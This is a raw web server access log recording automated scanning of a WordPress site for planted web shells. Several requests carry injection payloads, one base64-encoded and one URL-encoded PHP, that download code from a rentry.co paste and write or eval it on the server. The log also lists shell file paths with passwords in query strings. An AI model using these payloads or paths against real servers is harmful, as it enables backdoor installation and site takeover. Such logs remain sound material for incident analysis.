203.89.120.10 - - [11/Aug/2025:23:01:19 +0300] "GET /wp-content/plugins/anttt/simple.php HTTP/1.1" 301 795 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:02:53 +0300] "GET /.well-known/pki-validation/wp-login.php HTTP/1.1" 301 795 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:03:39 +0300] "GET /.well-known/pki-validation/wp-login.php HTTP/1.1" 301 795 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:06:35 +0300] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 301 795 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:06:40 +0300] "GET /wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/smoothness.php?wall=ZmlsZV9wdXRfY29udGVudHMoJ2luZGV4LnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcmVudHJ5LmNvLzh1cW9uOGh6L3JhdycpKTs= HTTP/1.1" 301 795 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:06:42 +0300] "GET /wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/index.php HTTP/1.1" 301 795 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:06:46 +0300] "GET /wp-includes/Requests/Exception/HTTP/HTTP.php?wall=ZmlsZV9wdXRfY29udGVudHMoJ2luZGV4LnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcmVudHJ5LmNvLzh1cW9uOGh6L3JhdycpKTs= HTTP/1.1" 301 795 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:06:48 +0300] "GET /wp-includes/Requests/Exception/HTTP/index.php HTTP/1.1" 301 795 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:07:25 +0300] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJ2luZGV4LnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcmVudHJ5LmNvLzh1cW9uOGh6L3JhdycpKTs= HTTP/1.1" 301 795 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:07:32 +0300] "GET /wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/smoothness.php?wall=ZmlsZV9wdXRfY29udGVudHMoJ2luZGV4LnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcmVudHJ5LmNvLzh1cW9uOGh6L3JhdycpKTs= HTTP/1.1" 301 795 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:07:41 +0300] "GET /wp-includes/SimplePie/about.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:08:08 +0300] "GET /wp-includes/SimplePie/file.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:09:33 +0300] "GET /wp-includes/SimplePie/about.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:09:45 +0300] "GET /wp-includes/SimplePie/plugins.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:09:49 +0300] "GET /wp-includes/SimplePie/file.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:06:33 +0300] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJ2luZGV4LnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcmVudHJ5LmNvLzh1cW9uOGh6L3JhdycpKTs= HTTP/1.1" 301 795 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:07:27 +0300] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 301 795 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:07:34 +0300] "GET /wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/index.php HTTP/1.1" 301 795 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:07:39 +0300] "GET /wp-includes/Requests/Exception/HTTP/HTTP.php?wall=ZmlsZV9wdXRfY29udGVudHMoJ2luZGV4LnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcmVudHJ5LmNvLzh1cW9uOGh6L3JhdycpKTs= HTTP/1.1" 301 795 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:07:41 +0300] "GET /wp-includes/Requests/Exception/HTTP/index.php HTTP/1.1" 301 795 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:07:46 +0300] "GET /wp-includes/SimplePie/plugins.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:07:54 +0300] "GET /wp-includes/SimplePie/index.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:08:04 +0300] "GET /wp-includes/SimplePie/plugins.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:09:37 +0300] "GET /wp-includes/SimplePie/plugins.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:09:41 +0300] "GET /wp-includes/SimplePie/index.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
43.173.1.57 - - [11/Aug/2025:23:10:01 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
203.89.120.10 - - [11/Aug/2025:23:13:05 +0300] "GET /rindex.php?action=add&parameter=optimasprimeoac.php%7Chttps://rentry.co/8uqon8hz/raw HTTP/1.1" 301 795 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:13:43 +0300] "GET /rindex.php?action=add&parameter=optimasprimeoac.php%7Chttps://rentry.co/8uqon8hz/raw HTTP/1.1" 301 795 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:14:32 +0300] "GET /sample?pd=1&mapname=themes.php&a=vx000&dstr=%3C?php%20%20%20function%20get($url)%20%7B%20%20%20%20$ch%20=%20curl_init();%20%20%20%20curl_setopt($ch,%20CURLOPT_HEADER,%200);%20%20%20%20curl_setopt($ch,%20CURLOPT_RETURNTRANSFER,%201);%20%20%20%20curl_setopt($ch,%20CURLOPT_URL,%20$url);%20%20%20%20$data%20=%20curl_exec($ch);%20%20%20%20curl_close($ch);%20%20%20%20return%20$data;%7D$ok%20=%20'?%3E';%20%20%20%20%20%20eval(%22$ok%22%20.%20get('https://rentry.co/8uqon8hz/raw'));?%3E HTTP/1.1" 301 795 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:14:35 +0300] "GET /themes.php HTTP/1.1" 301 795 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.133.143.227 - - [11/Aug/2025:23:14:57 +0300] "GET //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"
203.89.120.10 - - [11/Aug/2025:23:15:08 +0300] "GET /sample?pd=1&mapname=themes.php&a=vx000&dstr=%3C?php%20%20%20function%20get($url)%20%7B%20%20%20%20$ch%20=%20curl_init();%20%20%20%20curl_setopt($ch,%20CURLOPT_HEADER,%200);%20%20%20%20curl_setopt($ch,%20CURLOPT_RETURNTRANSFER,%201);%20%20%20%20curl_setopt($ch,%20CURLOPT_URL,%20$url);%20%20%20%20$data%20=%20curl_exec($ch);%20%20%20%20curl_close($ch);%20%20%20%20return%20$data;%7D$ok%20=%20'?%3E';%20%20%20%20%20%20eval(%22$ok%22%20.%20get('https://rentry.co/8uqon8hz/raw'));?%3E HTTP/1.1" 301 795 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:15:11 +0300] "GET /themes.php HTTP/1.1" 301 795 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.133.143.227 - - [11/Aug/2025:23:16:14 +0300] "GET /wp-includes/Text/Diff/orm.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
103.133.143.227 - - [11/Aug/2025:23:16:20 +0300] "GET /wp-includes/Text/Diff/zwso.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:16:27 +0300] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:16:31 +0300] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:13:07 +0300] "GET /optimasprimeoac.php HTTP/1.1" 301 795 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:13:46 +0300] "GET /optimasprimeoac.php HTTP/1.1" 301 795 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.133.143.227 - - [11/Aug/2025:23:14:57 +0300] "GET //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"
103.133.143.227 - - [11/Aug/2025:23:15:01 +0300] "GET /wp-includes/Text/Diff/zwso.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
103.133.143.227 - - [11/Aug/2025:23:15:02 +0300] "GET /wp-includes/Text/Diff/orm.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
103.133.143.227 - - [11/Aug/2025:23:16:09 +0300] "GET //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"
103.133.143.227 - - [11/Aug/2025:23:16:15 +0300] "GET //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"
103.133.143.227 - - [11/Aug/2025:23:16:16 +0300] "GET //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"
103.133.143.227 - - [11/Aug/2025:23:16:20 +0300] "GET /wp-includes/Text/Diff/ot.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:16:35 +0300] "GET /wp-content/plugins/linkpreview/db.php?u HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:16:45 +0300] "GET /wp-content/plugins/seoplugins/db.php?u HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.133.143.227 - - [11/Aug/2025:23:17:12 +0300] "GET /wp-includes/Text/Diff/mailer.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
103.133.143.227 - - [11/Aug/2025:23:17:23 +0300] "GET //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"
203.89.120.10 - - [11/Aug/2025:23:18:11 +0300] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:18:21 +0300] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:18:25 +0300] "GET /wp-content/plugins/linkpreview/db.php?u HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.133.143.227 - - [11/Aug/2025:23:18:37 +0300] "GET /wp-includes/Text/Diff/mailer.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:16:41 +0300] "GET /wp-content/themes/gaukingo/db.php?u HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.133.143.227 - - [11/Aug/2025:23:17:07 +0300] "GET //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"
103.133.143.227 - - [11/Aug/2025:23:17:27 +0300] "GET /wp-includes/Text/Diff/ot.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:18:30 +0300] "GET /wp-content/themes/gaukingo/db.php?u HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.133.143.227 - - [11/Aug/2025:23:18:32 +0300] "GET //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"
203.89.120.10 - - [11/Aug/2025:23:18:35 +0300] "GET /wp-content/plugins/seoplugins/db.php?u HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.133.143.227 - - [11/Aug/2025:23:51:09 +0300] "GET //wp-includes/Text/Diff/zwso.php HTTP/1.1" 301 795 "-" "python-requests/2.24.0"
103.133.143.227 - - [11/Aug/2025:23:51:03 +0300] "GET //wp-includes/Text/Diff/zwso.php HTTP/1.1" 301 795 "-" "python-requests/2.24.0"
23.94.126.26 - - [12/Aug/2025:00:19:34 +0300] "POST //wp-includes/Text/Diff/zwso.php?pass=no HTTP/1.1" 301 795 "-" "GuzzleHttp/7"
23.94.126.26 - - [12/Aug/2025:00:22:56 +0300] "POST //wp-includes/Text/Diff/mailer.php?pass=123 HTTP/1.1" 301 795 "-" "GuzzleHttp/7"
23.94.126.26 - - [12/Aug/2025:00:23:25 +0300] "POST //wp-includes/Text/Diff/mailer.php?pass=123 HTTP/1.1" 301 795 "-" "GuzzleHttp/7"
87.246.11.100 - - [12/Aug/2025:00:23:41 +0300] "GET http://mail.otwalmanwalaw.co.ke//wp-includes/Text/Diff/zwso.php HTTP/1.1" 301 795 "-" "-"
23.94.126.26 - - [12/Aug/2025:00:20:38 +0300] "POST //wp-includes/Text/Diff/zwso.php?pass=no HTTP/1.1" 301 795 "-" "GuzzleHttp/7"
87.246.11.100 - - [12/Aug/2025:00:23:41 +0300] "GET http://mail.otwalmanwalaw.co.ke//wp-includes/Text/Diff/zwso.php HTTP/1.1" 301 795 "-" "-"
87.246.11.100 - - [12/Aug/2025:00:24:18 +0300] "GET http://otwalmanwalaw.co.ke//wp-includes/Text/Diff/zwso.php HTTP/1.1" 301 795 "-" "-"
87.246.11.100 - - [12/Aug/2025:00:24:18 +0300] "GET http://otwalmanwalaw.co.ke//wp-includes/Text/Diff/zwso.php HTTP/1.1" 301 795 "-" "-"
87.246.11.100 - - [12/Aug/2025:00:26:25 +0300] "GET //wp-includes/Text/Diff/mailer.php?pass=123 HTTP/1.1" 301 795 "-" "-"
51.38.114.166 - - [12/Aug/2025:00:27:43 +0300] "GET /wp-includes/Text/Diff/ot.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
82.211.2.75 - - [12/Aug/2025:00:37:21 +0300] "GET /wp-includes/Text/Diff/mailer.php?pass=123 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
87.246.11.100 - - [12/Aug/2025:00:25:46 +0300] "GET //wp-includes/Text/Diff/mailer.php?pass=123 HTTP/1.1" 301 795 "-" "-"
51.38.114.166 - - [12/Aug/2025:00:28:09 +0300] "GET /wp-includes/Text/Diff/ot.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
64.44.18.230 - - [12/Aug/2025:00:38:20 +0300] "GET /wp-includes/Text/Diff/mailer.php?pass=123 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
23.95.22.251 - - [12/Aug/2025:00:46:08 +0300] "POST /wp-includes/Text/Diff/zwso.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
94.249.154.59 - - [12/Aug/2025:00:47:43 +0300] "POST /wp-includes/Text/Diff/zwso.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
165.232.65.95 - - [12/Aug/2025:00:58:20 +0300] "GET /wp-includes/Text/Diff/orm.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
51.158.36.17 - - [12/Aug/2025:00:58:21 +0300] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
51.159.225.130 - - [12/Aug/2025:01:00:26 +0300] "GET /wp-admin/js/widgets/index.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:06:40 +0300] "GET /404.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:06:44 +0300] "GET /wp.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:06:54 +0300] "GET /wp-includes/wp-class.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:07:00 +0300] "GET /wp-content/themes/twenty/twenty.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:07:07 +0300] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:07:26 +0300] "GET /admin.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
